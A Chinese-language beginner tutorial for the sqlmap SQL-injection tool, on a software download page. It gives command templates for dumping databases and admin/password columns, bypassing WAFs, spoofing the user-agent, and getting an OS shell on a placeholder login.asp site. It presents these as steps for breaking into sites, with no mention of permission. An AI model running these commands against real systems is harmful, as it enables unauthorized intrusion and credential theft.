您的位置:首頁 > 網(wǎng)絡(luò)軟件 > 站長工具 > sqlmap V0.9 官方下載
然后偶就屁顛屁顛滾去下了一個(gè),然后尼瑪,一連從頭看到尾。。。。。。各種科普啊,看視頻有點(diǎn)浪費(fèi)時(shí)間。
各位別去被坑爹了,來個(gè)sqlmap 簡易教程算了,何必浪費(fèi)看視頻的時(shí)間。
sqlmap 再牛逼也就是個(gè)python的腳本,腳本再牛逼也得有–help -hh
所以第一件事當(dāng)然是滾去看幫助文檔。
sqlmap -hh
我操。。。。。。。這么多英文,多少只草泥馬在心中奔騰,咋辦,硬著頭皮看唄,有些人頭皮硬不了咋辦,簡單,來,哥教你簡單的
注入分法不同,種類不同,來個(gè)簡單的分類:
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx”
3.cookie類注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2
好,區(qū)分完畢再來后續(xù)的
需要數(shù)據(jù)庫好:–dbs
得到數(shù)據(jù)庫名稱xxx,需要表: -D xxx –tables
得到表名xxxx,需要段:-D xxx -T xxxx –columns
得到段內(nèi)有admin,password,需要值:-D xxx -T xxxx -C “admin,password” –dump
那么我們來理解一下,-D -T -C 是干嗎的,當(dāng)然就是知道其名稱,指定使用其。
–dbs –tables –columns 是干嗎的,當(dāng)然就是不知道名稱,列出來唄
–dump 那自然就是字面意思,類似于導(dǎo)出數(shù)據(jù)的行為
其實(shí)注入有了上面這幾個(gè)命令,妥妥的夠用了,不過還需要繞waf –tamper=”"
注入被識別出來是工具,斷開咋辦–user-agent=”"
再多牛逼的功能都是慢慢積累出來的,別想一口吃成胖子
好,跑數(shù)據(jù)庫就是這么簡單,于是呢來一個(gè)稍微有點(diǎn)干貨的例子:
http://www.xxx.com/login.asp有post注入,我想日了,但是我不想出去拷貝post數(shù)據(jù),很麻煩,我想讓sqlmap自動跑post注入
sqlmap -u “http://www.xxx.com/login.asp” –forms
很好,上面的命令成功的幫我跑了post注入,并且找到了post的注入點(diǎn)jjj=123
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs
于是我用上面的命令看看數(shù)據(jù)庫
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –is-dba
順便看看當(dāng)前用戶是不是dba
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a
用了上面的命令 -a能得到什么呢:自己去看幫助吧。
幫你篩選了一下,-a下面的那些命令是用來看用戶,看主機(jī),看權(quán)限的。
后來呢,我發(fā)現(xiàn)權(quán)限還是挺高的,同時(shí)呢,我跑出來了數(shù)據(jù)庫名稱kkk
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables
同時(shí)我找到了網(wǎng)站路徑,然后我就又一次找到了sqlmap的牛逼的–os-xx系列命令,可以執(zhí)行系統(tǒng)命令,同時(shí)還發(fā)現(xiàn)了牛逼的xpcmdshell –os-shell
以及很多牛逼的文件操作命令–file-xx 這些命令在需要用的時(shí)候使用就是了,會給你帶來意想不到的驚喜
與此同時(shí),我發(fā)現(xiàn)tables里面沒有我想要的東西,我也找不到合適的內(nèi)容,咋辦呢,心一橫,我決定把所有的數(shù)據(jù)庫內(nèi)容跑出來自己找,于是我這么做:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all
然后牛逼的sqlmap就開始跑啊跑,然后緊接著我的蛋就碎了,尼瑪,sqlmap一會就問你一次要不要破解密碼,要不要這個(gè),要不要那個(gè),我和我的小朋友們都想擦你妹夫,功夫不負(fù)有心人,我又看見了一個(gè)命令 –batch 可以自動選擇sqlmap默認(rèn)選項(xiàng)
于是,我可以和我的小朋友們玩耍去了,再也不用看著sqlmap拖庫了。
總結(jié)下來,幫助文檔還是很重要的,多看看,總會有些收獲:
為了避免各位看英文看到吐,大概總結(jié)下:
Target: 字面意思,目標(biāo),那么就是確定目標(biāo)的
Request: 字面意思,請求,就是定義請求內(nèi)容的,比如post數(shù)據(jù),http頭,cookie注入,http頭污染等等
Optimization:字面意思,調(diào)節(jié)性能,等等
Injection: 字面意思,注入的設(shè)置內(nèi)容基本在這里,比如指定注入點(diǎn),指定db,指定系統(tǒng),等等
Detection:
基本就是用在確認(rèn)注入范圍,尋找注入點(diǎn)區(qū)域,這些
Technique:
基本用在確定注入手段,以及攻擊方式
Fingerprint:
基本用在指紋識別,用的很少
Enumeration:
枚舉信息,主要用在注入中,很重要,很常用
Brute force:
用來爆破,其實(shí)主要是枚舉tables columns用的
User-defined function injection:
現(xiàn)在只有udf提權(quán),以及指定一些自己定義的sqlmap腳本用,高端使用,求大牛指點(diǎn)
File system access
主要是文件讀取,文件寫入
Operating system access
主要用在對系統(tǒng)操作,例如os-shell 以及 后續(xù)的連接metasploit 實(shí)現(xiàn)后滲透攻擊
windows registry access
基本就是注冊表操作了
General
字面意思,綜合的內(nèi)容,一些特殊的功能實(shí)現(xiàn),我在這里找到了crawl batch這些非常好用的參數(shù)
Miscellaneous
目測高端應(yīng)用,還沒怎么用過,求大神指教
如上面總結(jié)的,大概紅字就是常用的命令,剩下的不常用里面也有很多很不錯(cuò),在特殊情況下適用的內(nèi)容,反正本貼科普而已。
字有點(diǎn)多,想看的菜鳥朋友認(rèn)真看下來應(yīng)該會有些收獲,菜鳥們?nèi)绻惺裁雌渌钠婕家桑希望分享1、2 共同進(jìn)步!!
本站所有軟件,都由網(wǎng)友上傳,如有侵犯你的版權(quán),請發(fā)郵件[email protected]
湘ICP備2022002427號-10 湘公網(wǎng)安備:43070202000427號© 2013~2025 haote.com 好特網(wǎng)